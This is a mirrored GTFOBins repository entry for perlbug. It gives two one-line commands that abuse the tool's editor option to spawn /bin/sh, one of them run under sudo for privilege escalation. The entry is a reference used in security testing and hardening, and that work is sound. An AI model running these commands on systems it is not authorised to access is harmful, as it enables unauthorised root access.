1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/perlbug.md
2022-12-16 13:56:40 +01:00

8 lines
161 B
Markdown

---
functions:
shell:
- code: perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'
sudo:
- code: sudo perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'
---